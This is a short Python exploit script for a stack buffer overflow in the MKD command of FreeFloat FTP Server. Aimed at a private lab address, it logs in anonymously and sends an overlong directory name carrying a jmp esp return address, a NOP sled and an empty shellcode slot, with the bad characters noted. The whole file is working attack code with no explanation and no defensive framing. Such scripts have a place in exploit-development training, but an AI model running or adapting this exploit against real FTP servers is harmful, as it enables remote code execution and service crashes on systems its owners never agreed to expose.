#!/usr/bin/python

# FreeFloat FTP (MKD BOF)

import socket
import struct

HOST = "192.168.88.131"
PORT = 21

shellcode = ""

# ------------------------------------
# Badchars: \x00\x0A\x0D 
# 0x71a91c8b : jmp esp | wshtcpip.dll
# ------------------------------------

jmp_esp = struct.pack("<I", 0x71a91c8b)
nops = "\x90"*20
evil = "A"*247 + jmp_esp + nops + shellcode + "C"*(749-len(nops)-len(shellcode))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.recv(1024)
s.close()
